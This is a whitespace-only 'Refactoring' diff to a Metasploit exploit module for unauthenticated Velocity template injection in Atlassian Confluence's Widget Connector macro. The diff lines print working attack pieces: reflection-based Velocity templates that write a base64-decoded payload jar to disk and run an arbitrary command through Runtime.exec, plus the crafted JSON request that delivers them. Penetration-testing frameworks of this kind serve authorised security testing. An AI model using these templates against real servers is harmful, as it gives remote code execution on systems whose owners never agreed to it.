Refactoring
@@ -16,13 +16,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Name' => "Atlassian Confluence Widget Connector Macro Velocity Template Injection",
|
||||
'Description' => %q{
|
||||
Widget Connector Macro is part of Atlassian Confluence Server and Data Center that
|
||||
allows embed online videos, slideshows, photostreams and more directly into page.
|
||||
A _template parameter can be used to inject remote Java code into a Velocity template,
|
||||
and gain code execution. Authentication is unrequired to exploit this vulnerability.
|
||||
By default, Java payload will be used because it is cross-platform, but you can also
|
||||
allows embed online videos, slideshows, photostreams and more directly into page.
|
||||
A _template parameter can be used to inject remote Java code into a Velocity template,
|
||||
and gain code execution. Authentication is unrequired to exploit this vulnerability.
|
||||
By default, Java payload will be used because it is cross-platform, but you can also
|
||||
specify which native payload you want (Linux or Windows).
|
||||
|
||||
Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version
|
||||
Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version
|
||||
6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.
|
||||
|
||||
This vulnerability was originally discovered by Daniil Dmitriev
|
||||
@@ -83,9 +83,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
when /javaprop\.vm$/
|
||||
conn.put(wrap(get_javaprop_vm()))
|
||||
when /upload\.vm$/
|
||||
conn.put(wrap(get_upload_vm()))
|
||||
conn.put(wrap(get_upload_vm()))
|
||||
when /exec\.vm$/
|
||||
conn.put(wrap(get_exec_vm()))
|
||||
conn.put(wrap(get_exec_vm()))
|
||||
else
|
||||
conn.put(wrap(get_dummy_vm()))
|
||||
end
|
||||
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
$i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))
|
||||
EOF
|
||||
)
|
||||
end
|
||||
end
|
||||
|
||||
# Returns a command execution template.
|
||||
#
|
||||
@@ -134,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()
|
||||
EOF
|
||||
)
|
||||
end
|
||||
end
|
||||
|
||||
# Returns checking template.
|
||||
#
|
||||
@@ -166,9 +166,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
<<~EOF
|
||||
EOF
|
||||
)
|
||||
end
|
||||
end
|
||||
|
||||
# Checks the vulnerability.
|
||||
# Checks the vulnerability.
|
||||
#
|
||||
# @return [Array] Check code
|
||||
def check
|
||||
@@ -203,10 +203,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'uri' => uri,
|
||||
'headers' => {
|
||||
'Accept' => '*/*',
|
||||
'Origin' => full_uri(vhost_uri: true)
|
||||
'Origin' => full_uri(vhost_uri: true)
|
||||
},
|
||||
'ctype' => 'application/json; charset=UTF-8',
|
||||
'data' => {
|
||||
'data' => {
|
||||
'contentId' => '1',
|
||||
'macro' => {
|
||||
'name' => 'widget',
|
||||
@@ -332,7 +332,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
fail_with(Failure::Unknown, 'Unable to get the temp path.')
|
||||
end
|
||||
|
||||
@fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar")
|
||||
@fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar")
|
||||
@b64 = Rex::Text.encode_base64(payload.encoded_jar)
|
||||
@command = ''
|
||||
|
||||
|
||||